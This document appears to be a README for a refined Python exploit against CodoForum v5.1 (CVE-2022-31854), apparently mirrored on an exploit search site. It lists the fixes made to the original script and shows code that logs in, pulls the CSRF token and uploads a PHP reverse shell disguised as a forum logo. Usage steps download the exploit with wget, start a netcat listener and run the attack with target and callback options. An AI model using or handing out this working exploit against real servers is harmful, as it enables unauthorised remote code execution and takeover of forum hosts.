Share
## https://sploitus.com/exploit?id=DFC12915-3107-5162-8B52-0D0FD1C3534B
# CodoForum v5.1 - Authenticated RCE (Fixed Exploit)
**CVE:** 2022-31854 | **EDB-ID:** 50978 

This repository contains a refined and fully working Python 3 exploit for the CodoForum v5.1 Authenticated Remote Code Execution via File Upload vulnerability. 

### Credits
* **Original Exploit Author:** Krish Pandey (@vikaran101) - [Original Medium Writeup](https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc)
* **Refined & Corrected By:** Simon Fung

---

## What Was Changed & Refined?

The original exploit script on Exploit-DB contained several hardcoded values and syntax issues so gg. I made these chaanges using Gemini:

1. **Dynamic CSRF Token Extraction:** The original script hardcoded a specific CSRF token. If the target server's token didn't match, the upload failed silently, resulting in a `404 Not Found` when triggering the shell. 
2. **Fixed Hardcoded Credentials:** The original script ignored the user-supplied `-u` and `-p` arguments, hardcoding `admin:admin` (thought its default credential) inside a massive multipart string. 
3. **Removed Hardcoded Proxy:** The script forced traffic through `127.0.0.1:8080`, crashing if a local proxy (probably original for burpsuite) wasn't running. Proxy settings are now disabled by default.
4. **Cleaned Up Multipart Requests:** More clean yeh
5. **Syntax Errors Fixed:** Fixed `SyntaxWarning: invalid escape sequence` errors caused by the ASCII banner by converting it to a raw string (`r"""..."""`). When I first running the script no idea would encouter this issue.

---

## Code Comparison: Before vs. After

### 1. Handling Credentials
**Before:**
```python
def login():
    # Ignored user arguments entirely
    send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--"
    auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy)
```

**After:**
```python
def login_and_exploit():
    # Uses CLI arguments and native requests formatting
    login_data = {"username": options.username, "password": options.password}
    r_login = session.post(loginURL, data=login_data, verify=False)
```

### 2. Handling the CSRF Token
**Before:**
```python
def uploadAndExploit():
    # Inside a massive string payload block...
    Content-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n
```

**After:**
```python
    # Extract real CSRF token from the global settings page
    r_config = session.get(globalSettings, verify=False)
    match = re.search(r'name="CSRF_token"\s+value="([^"]+)"', r_config.text)
    
    csrf_token = match.group(1) if match else "23cc3019cadb6891ebd896ae9bde3d95"
    
    # Pass dynamically to the upload payload
    files = {
        'CSRF_token': (None, csrf_token),
        'forum_logo': (f'{randomFileName}.php', rev_shell, 'application/x-php'),
        # ... other required fields
    }
    session.post(globalSettings, files=files, verify=False)
```

---

## How to use
0. Get my exploit.py first, wget so w
   ```bash
   wget https://github.com/skiraware/CodoForum-v5.1---Remote-Code-Execution-RCE-/raw/refs/heads/main/exploit.py
   ```
   
2. Start your Netcat listener:
   ```bash
   nc -lvnp 4445
   ```
3. Run the exploit (Ensure you provide the correct URL path):
   ```bash
   python3 exploit.py -t http:/// -u  -p  -i  -n 4445
   ```

*Note: If CodoForum is hosted in a subdirectory, append it to the target flag (e.g., `-t http:///somepages`).*